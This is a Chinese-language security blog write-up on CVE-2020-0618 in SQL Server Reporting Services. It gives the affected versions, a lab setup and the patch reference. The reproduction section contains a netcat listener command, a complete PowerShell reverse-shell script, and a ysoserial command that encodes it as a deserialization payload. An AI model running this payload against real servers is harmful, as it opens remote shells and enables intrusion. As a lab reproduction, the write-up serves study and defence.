本文作者:daxi0ng(团队核心成员)
本文字数:1072
阅读时长:2~3min
声明:请勿用作违法用途,否则后果自负
0x01 简介
2月12日,微软发布安全更新披露了Microsoft SQL Server Reporting Services 远程代码执行漏洞(CVE-2020-0618)。SQL Server 是Microsoft 开发的一个关系数据库管理系统(RDBMS),是现在世界上广泛使用的数据库之一。
0x02 漏洞概述
获得低权限的攻击者向受影响版本的SQL Server的Reporting Services实例发送精心构造的请求,可利用此漏洞在报表服务器服务帐户的上下文中执行任意代码。
0x03 影响版本
SQL Server 2012 for 32-bit Systems Service Pack 4 (QFE) SQL Server 2012 for x64-based Systems Service Pack 4 (QFE) SQL Server 2014 Service Pack 3 for 32-bit Systems (CU) SQL Server 2014 Service Pack 3 for 32-bit Systems (GDR) SQL Server 2014 Service Pack 3 for x64-based Systems (CU) SQL Server 2014 Service Pack 3 for x64-based Systems (GDR) SQL Server 2016 for x64-based Systems Service Pack 1 SQL Server 2016 for x64-based Systems Service Pack 2 (CU) SQL Server 2016 for x64-based Systems Service Pack 2 (GDR)
0x04 环境搭建
1、安装Windows server 2016 Standard
2、安装Sql Server 2016,其中有几个点需要注意
一路默认安装下来。注意功能选择的时候需要选择"数据库引擎服务"和"Reporting Services"服务
这里用混合模式创建账号 账号sa 密码123qweQWE 便于后面连接报表服务器
又是一路默认,安装完成
3、重点来了!访问 http://localhost/ReportS,创建分页报表,提示需要安装报表服务器
4、安装好报表服务器后,新建一个报表此时就用到了我们前面设置的账号密码 sa/123qweQWE
保存一下,然后点击运行
访问一下漏洞路径,Success!
0x05 漏洞复现
1、使用Netcat监听1888端口,便于后续接受反弹回来的Shell(WIN Rpowshell)
cd .Desktopnetcat-1.11_1.nc.exe -lvp 1888
2、点击桌面的postman,send
3、此时Shell已经弹回,使用 whoami 命令可以看到Shell的用户是 nt servicereportservice
PS:(此步可省略) 以上是我已经生成了验证POC,想要自己生成POC可以使用powershell打开ysoserial.exe工具生成有效负载,执行完最后一步的时候payload已经存在于剪切板。
$command = '$client = New-Object System.Net.Sockets.TCPClient("127.0.0.1",1888);$stream = $client.GetStream();[byte[]]$bytes = 0..65535|%{0};while(($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0){;$data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes,0, $i);$sendback = (iex $data 2>&1 | Out-String );$sendback2 =$sendback "PS " (pwd).Path "> ";$sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2);$stream.Write($sendbyte,0,$sendbyte.Length);$stream.Flush()};$client.Close()'
$bytes = [System.Text.Encoding]::Unicode.GetBytes($command)
$encodedCommand = [Convert]::ToBase64String($bytes)
.ysoserial.exe -g TypeConfuseDelegate -f LosFormatter -c "powershell.exe -encodedCommand $encodedCommand" -o base64 | clip
0x06 修复方式
目前微软官方已针对受支持的版本发布了修复该漏洞的安全补丁,请受影响的用户尽快安装补丁进行防护。
官方下载链接:
https://portal.msrc.microsoft.com/zh-cn/security-guidance/advisory/CVE-2020-0618